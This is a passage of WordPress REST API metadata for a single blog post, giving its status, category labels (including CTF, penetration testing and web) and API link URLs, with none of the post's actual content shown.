[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-526","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=526"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions"}],"predecessor-version":[{"id":527,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions\/527"}],"wp:attachment":[{"href":"http:\
/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=526"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}